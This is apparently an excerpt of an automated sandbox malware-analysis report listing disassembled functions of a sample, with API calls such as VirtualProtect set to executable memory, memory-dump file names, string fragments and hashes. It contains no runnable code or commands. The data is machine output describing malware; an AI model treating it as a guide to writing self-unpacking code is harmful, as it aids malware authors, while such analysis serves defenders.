                                                                  • Instruction ID: d34d96ea33b28178faef7823f5d1e9e09da383ed3bc09bc8e5fbfe26791844d3
                                                                  • Opcode Fuzzy Hash: ff0b00d2677e5bf47b477799f7ef043f7de6343b797cf1b94cb9fb8b8eb8754b
                                                                  • Instruction Fuzzy Hash: 9AC145A1D082949BF7218624DC857EB7B79DF91310F1481FAD44D6A281D27E0FC6CB67
                                                                  Function 0040B9A7 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 341memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: b2e9ca790998229f48eaf2e527f22e732d548b3efc56ddd507ed2ea0ef285c88
                                                                  • Instruction ID: 3a6b4da2a2b2809e840b2a73b18af85368b5c2db675c533ba78e0bedf2602794
                                                                  • Opcode Fuzzy Hash: b2e9ca790998229f48eaf2e527f22e732d548b3efc56ddd507ed2ea0ef285c88
                                                                  • Instruction Fuzzy Hash: 80C144A1D082949AF7218624DC85BEB7B79EF91310F1481FAD44D6A281D27E0FC6CB67
                                                                  Function 0040B504 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 339memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 544645111-3058551535
                                                                  • Opcode ID: 493a61eb689b9f4ef1c688a9a34eb757a2f489e76d5ef56f9269c69b895548e3
                                                                  • Instruction ID: bd6dbe7b93dd49523c411a6b41401e31f19f475237dc029cb7e675cf6393c82b
                                                                  • Opcode Fuzzy Hash: 493a61eb689b9f4ef1c688a9a34eb757a2f489e76d5ef56f9269c69b895548e3
                                                                  • Instruction Fuzzy Hash: BCC144A1D082989BF7218624DC85BEB7A79EF91310F1481FAD44D66281D27E0FC6CB67
                                                                  Function 0040BB4A Relevance: 42.3, APIs: 1, Strings: 23, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                  • API String ID: 0-3789451
                                                                  • Opcode ID: 728d33ce5cd8392fae6969d104fd9af6f9ef25b71e3e986a57db29dd23adc8fa
                                                                  • Instruction ID: 874e2093608d45835aede55c8446f2b5f904800d1c55310015db4c22bb41d1fc
                                                                  • Opcode Fuzzy Hash: 728d33ce5cd8392fae6969d104fd9af6f9ef25b71e3e986a57db29dd23adc8fa
                                                                  • Instruction Fuzzy Hash: 63B176A2D082949AF7218624DC457EB7A79EF91310F1480FED44D2B681D2BE0FC6CB67
                                                                  Function 0040BBF1 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 269COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                  • API String ID: 0-4069139063
                                                                  • Opcode ID: 9df7d5d23bbc09a76e55fc722713846a0b7298c9866ff876747dccc9071441c2
                                                                  • Instruction ID: 122b3ec247b77071abeb3fe2ad62212ee0e4536a4f113f9908a4b273c503602e
                                                                  • Opcode Fuzzy Hash: 9df7d5d23bbc09a76e55fc722713846a0b7298c9866ff876747dccc9071441c2
                                                                  • Instruction Fuzzy Hash: 949153A2D082949BF7218624DC457EB7A39EFD1310F1481FED84D6A681D27E0FC68B67
                                                                  Function 0040BF78 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                  • API String ID: 0-4069139063
                                                                  • Opcode ID: 611d0005cabf44f96822be3f0a8812cbaa8a3fd56c920439c72d0e02ee5dcf49
                                                                  • Instruction ID: 03bbd1a9fcc01feb49f49906e2d0f8e8fd5ee5de2a67679feec8f5ef71f9b084
                                                                  • Opcode Fuzzy Hash: 611d0005cabf44f96822be3f0a8812cbaa8a3fd56c920439c72d0e02ee5dcf49
                                                                  • Instruction Fuzzy Hash: 057113A1D082549AF7218724DC85BEB7A39EF90710F1481FEE44D66681D67E0FC6CB2B
                                                                  Function 0040BFB0 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 206COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                  • API String ID: 0-4069139063
                                                                  • Opcode ID: f76258e3d6a9618a04de03aee0d9a9e170243ee4795f5539bebb1bff34a34aa5
                                                                  • Instruction ID: 1ba5fe4495c7287c7b9ef3fb20152038ef40ca83fee558dec99f9d06b972943c
                                                                  • Opcode Fuzzy Hash: f76258e3d6a9618a04de03aee0d9a9e170243ee4795f5539bebb1bff34a34aa5
                                                                  • Instruction Fuzzy Hash: 2A7103A2D082549AF7218724DC45BEB7A39DFD0710F1481FED44D66681E6BE0FC68B2B
                                                                  Function 0040BD59 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 197COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                  • API String ID: 0-4069139063
                                                                  • Opcode ID: e7b9b8927a1f308dcd6adc6b7bae82f96a8f9014b9efb6e6694a513b61e6bd0a
                                                                  • Instruction ID: 05d83e1bdd861b36c7118d7b3db9dfa3e57a712bef10cd6f58d093f64900b8b7
                                                                  • Opcode Fuzzy Hash: e7b9b8927a1f308dcd6adc6b7bae82f96a8f9014b9efb6e6694a513b61e6bd0a
                                                                  • Instruction Fuzzy Hash: C46103A1D08254DAF7218724DC457EB7A39DFD0710F2481FED44D6A681E6BE0BC68B2B
                                                                  Function 0040BD66 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 196COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                  • API String ID: 0-4069139063
                                                                  • Opcode ID: 550748123659a34964c3edfdc6818248ee6223c2fc985f01e5edfecb57c9d602
                                                                  • Instruction ID: 208619864822ded23b9f0fc6e8d017ad9afea93b209a8c31258b565a3838358e
                                                                  • Opcode Fuzzy Hash: 550748123659a34964c3edfdc6818248ee6223c2fc985f01e5edfecb57c9d602
                                                                  • Instruction Fuzzy Hash: 246133A1D08294DAF7218724DC457EB7A39DFD0710F1481FED44D66681D6BE0BC68B27
                                                                  Function 0040BD60 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 195COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                  • API String ID: 0-4069139063
                                                                  • Opcode ID: 9ddb5a7f7316180acbc25141c48f4b95fb4f7d769d39293a7c0d0e919ba87399
                                                                  • Instruction ID: fd5885023f4b358d4eac04baf7284476dbc9d60256054ac93b075ccfc545bb63
                                                                  • Opcode Fuzzy Hash: 9ddb5a7f7316180acbc25141c48f4b95fb4f7d769d39293a7c0d0e919ba87399
                                                                  • Instruction Fuzzy Hash: D7611491D08294DAF7218724DC457EB7A39DFD0710F1481FED44D6A681D6BE0BC68B27
                                                                  Function 0040BFD1 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                  • API String ID: 0-4069139063
                                                                  • Opcode ID: cf732239f50026ec166b5f8a304eb691d086f306dfed2806414a5b96e8da4638
                                                                  • Instruction ID: b91351a602d593e604c9a597045b4f32dd95b2873b3e86a3e59e99e712c295bb
                                                                  • Opcode Fuzzy Hash: cf732239f50026ec166b5f8a304eb691d086f306dfed2806414a5b96e8da4638
                                                                  • Instruction Fuzzy Hash: C76103A1D08294DAF7218724DC457EB7A39DFD0710F1481FED44D6A681E6BE0BC68B27
                                                                  Function 0040C635 Relevance: 1.7, APIs: 1, Instructions: 188COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                  Memory Dump Source
